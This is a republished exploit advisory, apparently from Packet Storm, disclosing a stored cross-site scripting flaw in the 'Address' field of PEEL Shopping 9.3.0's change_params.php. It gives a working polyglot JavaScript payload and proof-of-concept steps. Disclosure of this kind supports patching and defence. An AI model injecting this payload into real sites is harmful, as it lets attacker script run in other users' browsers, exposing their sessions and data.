PEEL Shopping 9.3.0 Cross Site Scripting ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on February 12th, 2021 📆 | 6081 Views ⚑

0

PEEL Shopping 9.3.0 Cross Site Scripting ≈ Packet Storm

PEEL Shopping 9.3.0 Cross Site Scripting
Posted Feb 11, 2021
Authored by Anmol K Sachan

PEEL Shopping version 9.3.0 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
MD5 | 6784a3a8c9528a3c39f7b4d5f5a6d69a
# Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting
# Date: 2021-02-11
# Exploit Author: Anmol K Sachan
# Vendor Homepage: https://www.peel.fr/
# Software Link: https://sourceforge.net/projects/peel-shopping/
# Software: : PEEL SHOPPING 9.3.0
# Vulnerability Type: Stored Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10 XAMPP
# This application is vulnerable to Stored XSS vulnerability.
# Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php
# Vulnerable parameters: 'Address'
# Payload used:

jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//x3csVg/x3e

# POC: in the same page where we injected payload click on the text box to edit the address.
# You will see your Javascript code (XSS) executed.

Source link

Tagged with:



Leave a Reply